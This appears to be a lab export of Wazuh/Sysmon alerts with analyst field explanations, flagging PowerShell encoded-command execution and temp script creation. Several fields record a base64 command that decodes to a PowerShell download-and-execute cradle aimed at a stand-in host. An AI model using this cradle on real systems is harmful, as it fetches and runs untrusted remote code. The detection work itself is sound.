No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zanwxrjo.ewu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:16.916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:20.865+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:20.865+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534300.1596097
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:18.9901696Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284498
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:17.923 ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ProcessId: 15800 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ParentProcessId: 15624 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:17.923
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:21.940+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:21.940+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  72
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534301.1604168
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:19.2856439Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284499
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:19.204 ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ProcessId: 15800 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tfqszefa.cbk.ps1 CreationUtcTime: 2025-04-24 22:38:19.204 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:19.204
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tfqszefa.cbk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:19.204
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:24.377+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:24.377+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  69
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534304.1606937
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:22.3661813Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284546
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:20.548 ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ProcessId: 15900 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ParentProcessId: 15800 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:20.548
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:24.380+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:24.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  73
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534304.1615008
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:22.5603577Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284547
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:22.512 ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ProcessId: 15900 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_uba1xjco.x5u.ps1 CreationUtcTime: 2025-04-24 22:38:22.512 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:22.512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uba1xjco.x5u.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:22.512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

